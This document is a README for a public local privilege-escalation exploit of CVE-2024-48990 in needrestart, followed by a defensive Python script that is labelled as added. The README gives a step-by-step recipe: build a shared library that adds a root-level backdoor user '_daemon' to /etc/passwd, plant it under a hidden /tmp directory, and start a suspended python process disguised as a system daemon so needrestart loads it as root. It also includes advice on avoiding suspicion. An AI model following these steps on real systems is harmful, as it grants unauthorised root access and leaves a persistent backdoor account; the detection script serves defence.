Exploit for CVE-2024-48990 (Local Privilege Escalation in needrestart < 3.8)
ns989/CVE-2024-48990
CVE-2024-48990

Background

Read https://blog.qualys.com/vulnerabilities-threat-research/2024/11/19/qualys-tru-uncovers-five-local-privilege-escalation-vulnerabilities-in-needrestart. Qualys does a great job explaining it.

TL;DR

On systems with needrestart less than 3.8, local users can execute arbitrary code and escalate privileges to root with no user interaction.

[Screenshot from 2024-11-21 20-07-48]

Exploit

The exploit as it's written now will add a new user called "_daemon" to the system with UID/GID of 0 (root) by using a sed command to edit the /etc/passwd file. The password is the same as the username. Not even sure you could call it an exploit since it's just a shared library that runs a single command.

To compile the exploit for yourself, run the below:

gcc exploit.c -o exploit.so -shared -fPIC -s

1. Create a directory to store the exploit files. The directory you create needs to have a subdirectory called "importlib".

mkdir -p /tmp/.X11-Unix/importlib

2. Start a process that will trigger the exploit

You could run any long-running python script. But to look less suspicious in the process list, you can use this one-liner to start a python interpreter that gets suspended as soon as it starts (so it never actually executes anything). It reads three environment variables:

  • PYTHON - The path to the python interpreter

  • ARGV - The string that will appear in the process list

  • PYPATH - The path to the directory you created (not including the importlib directory)

For ARGV make sure that:

  • the path to the python interpreter is the first argument in ARGV

  • the second argument (the "script") is a file that actually exists on the system (needrestart checks this). Doesn't need to be a real python script.

  • the second argument isn't the same as a process that's already running (needrestart will use the "cached" one it has already seen).

Other than that, you can play around with the ARGV as much as you want. Maybe make it look like a normal system process?

PYPATH=/tmp/e/ PYTHON=/usr/bin/python3 ARGV='/usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers' python3 -c 'import os,ctypes; libc=ctypes.CDLL("libc.so.6"); pid=os.fork(); exit() if pid > 0 else print("\n",os.getpid()); libc.ptrace(0, 0, 0, 0); os.execvpe(os.environ["PYTHON"], os.environ["ARGV"].split(), {"PYTHONPATH":os.environ["PYPATH"]})'

3. Move the exploit shared object to the right spot

It needs to be within the importlib directory and named "__init__.so".

mv /tmp/exploit.so /tmp/.X11-Unix/importlib/__init__.so

4. Wait for needrestart to do its thing

The next time needrestart runs (i.e. an update with apt or unattended-upgrades starts it), it will run python with our process' PYTHONPATH variable and load the __init__.so file, which will run our command. You'll be able to log in with the credentials _daemon:_daemon.

Things that can stop the exploit from working

needrestart isn't completely dumb and checks a few things when scanning processes and before it enters the vulnerable part of the code:

  • Is the process a running python script? If not, it skips it (python -c processes get skipped)
  • Has the process already been seen? Can't make a carbon copy of another process (i.e. unattended-upgrade-shutdown or networkd-dispatcher) or it'll get skipped.
  • If /etc/needrestart/needrestart.conf has "$nrconf{interpscan}" set to "0", you're out of luck.
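The three conditions above are also the things a defender can check for. The following script is an added example written for this page, not code from the ns989 repository: it tests whether the installed needrestart version is below the fixed 3.8, whether /etc/needrestart/needrestart.conf still has "$nrconf{interpscan}" enabled (the README says setting it to 0 blocks the bug), and whether any running process carries a PYTHONPATH that points into a world-writable scratch directory, which is the precondition steps 1 and 2 set up. Assumptions, labelled in the code: the config uses the Perl assignment form "$nrconf{interpscan} = 0;", an absent assignment means the feature is enabled, and the list of untrusted directory prefixes is a starting point rather than a complete one.

```python
"""Defender-side checks for the needrestart interpreter-scan weakness (CVE-2024-48990).

Each check is a pure function so it can be exercised on constructed input:
  1. is_vulnerable_version()  - needrestart < 3.8 (the fixed version named in the README)
  2. interpscan_enabled()     - whether needrestart.conf leaves $nrconf{interpscan} on
  3. untrusted_pythonpath()   - PYTHONPATH entries in a process environment that point
                                into world-writable scratch directories
scan_running_processes() applies check 3 to /proc on a live Linux host.
"""
import os
import re

FIXED_VERSION = (3, 8)

# Scratch locations any local user can write to (assumed list; extend as needed).
UNTRUSTED_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")


def parse_version(version: str) -> tuple:
    """Reduce a package version such as '3.6-5ubuntu2' to (major, minor)."""
    m = re.match(r"\s*(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised needrestart version: {version!r}")
    return int(m.group(1)), int(m.group(2))


def is_vulnerable_version(version: str) -> bool:
    """True when the version predates the 3.8 fix."""
    return parse_version(version) < FIXED_VERSION


# Matches the Perl-style assignment used in /etc/needrestart/needrestart.conf.
_INTERPSCAN = re.compile(r"^\s*\$nrconf\{interpscan\}\s*=\s*(\d+)\s*;")


def interpscan_enabled(conf_text: str) -> bool:
    """Return True if the config leaves interpreter scanning on.

    Lines starting with '#' are comments; the last uncommented assignment wins.
    Assumption: with no assignment present the feature defaults to enabled.
    """
    enabled = True
    for line in conf_text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        m = _INTERPSCAN.match(line)
        if m:
            enabled = m.group(1) != "0"
    return enabled


def untrusted_pythonpath(environ_blob: bytes) -> list:
    """Parse a /proc/<pid>/environ blob (NUL-separated KEY=VALUE entries) and
    return the PYTHONPATH components that resolve into an untrusted prefix."""
    hits = []
    for entry in environ_blob.split(b"\0"):
        if not entry.startswith(b"PYTHONPATH="):
            continue
        value = entry[len(b"PYTHONPATH="):].decode("utf-8", "replace")
        for path in value.split(os.pathsep):
            if not path:
                continue
            # Normalise so '/tmp' and '/tmp/e/' compare the same way.
            if (os.path.normpath(path) + "/").startswith(UNTRUSTED_PREFIXES):
                hits.append(path)
    return hits


def scan_running_processes(proc_root: str = "/proc") -> list:
    """Walk /proc and report (pid, cmdline, hits) for processes whose environment
    carries an untrusted PYTHONPATH.  Reading other users' environ files needs
    root; unreadable or vanished entries are skipped rather than aborting."""
    findings = []
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        try:
            with open(f"{proc_root}/{name}/environ", "rb") as f:
                hits = untrusted_pythonpath(f.read())
            if hits:
                with open(f"{proc_root}/{name}/cmdline", "rb") as f:
                    cmd = f.read().replace(b"\0", b" ").decode("utf-8", "replace").strip()
                findings.append((int(name), cmd, hits))
        except OSError:
            continue
    return findings


if __name__ == "__main__":
    # Constructed samples, not taken from any real host.
    SAMPLE_CONF = "#$nrconf{interpscan} = 1;\n$nrconf{interpscan} = 0;\n"
    SAMPLE_ENVIRON = b"PATH=/usr/bin\0PYTHONPATH=/tmp/e/:/usr/lib/python3/dist-packages\0HOME=/home/u\0"
    print("version 3.7 vulnerable:", is_vulnerable_version("3.7"))
    print("interpscan enabled in sample conf:", interpscan_enabled(SAMPLE_CONF))
    print("untrusted PYTHONPATH entries:", untrusted_pythonpath(SAMPLE_ENVIRON))
    if os.path.isdir("/proc"):
        for pid, cmd, hits in scan_running_processes():
            print(f"pid {pid}: {cmd} -> PYTHONPATH {hits}")
```

On a patched host the first check is the one that matters; on a host that cannot be upgraded yet, confirming that interpscan is off and that no process is sitting with a PYTHONPATH under /tmp gives a quick read on exposure. The /proc scan only sees what the invoking user may read, so run it as root for a complete picture.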
